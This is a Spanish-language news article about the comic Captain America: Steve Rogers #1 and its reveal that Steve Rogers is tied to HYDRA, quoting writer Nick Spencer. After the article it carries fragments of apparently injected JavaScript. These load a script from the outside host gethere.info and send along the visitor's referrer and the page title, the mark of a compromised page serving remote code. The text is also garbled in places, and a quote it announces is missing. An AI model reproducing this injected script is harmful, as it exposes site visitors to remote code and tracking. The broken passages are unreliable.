¡Hemos vivido engañados! Revelan que Capitán América en realidad es de los malos

El nuevo cómic, es un importante relanzamiento, el cual se centra en un rejuvenecido Steve Rogers, que recuperó sus habilidades después de los eventos de “Avengers: Standoff”. Y marca la primera ocasión que habrá dos Centinelas de la Libertad; ya que Captain America: Sam Wilson no esta cesando su publicación. Esta nueva revista, está escrita por Nick Spencer (que también escribe Sam Wilson) y cuenta con el arte de Jesus Saiz.

Sin embargo, lo que nadie se esperaba era una enorme revelación, que no solo pone al cómic Sam Wilson en nuevo contexto, sino que posiblemente replanté toda la historia del Capitán América.

Durante el final de este primer número, Rogers hizo la siguiente (controversial) declaración:

Este cambio de afiliación del Capitán también fue reforzado durante un subplot presentado a modo de flashback el cual se sitúa en 1926; en la cual vemos que Sarah Rogers (la madre de Steve), es ayudada por una misteriosa mujer de nombre Elisa Sinclair, quien la invita a unirse a una comunidad que podría ser beneficioso para ella. Y dicha comunidad es HYDRA.

Spencer declaró a Entertainment Weekly sobre esta revelación, de manera tajante que el personaje es Steve Rogers. “Puedo decirles algo: no es un clon, no es un impostor, no está bajo control mental, no es nadie haciéndose pasar por Steve”. reveló el escritor. “El es en realidad Steve Rogers, es mismísimo Capitán América”. Spencer también adelantó que esta revelación tendrá un profundo impacto en la historia y vida de Sam Wilson.

Captain America: Steve Rogers #1 y está a la venta por si quieres leer está gran revelación

<> = “http:///search.htm?route=search&q=”;

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Comentarios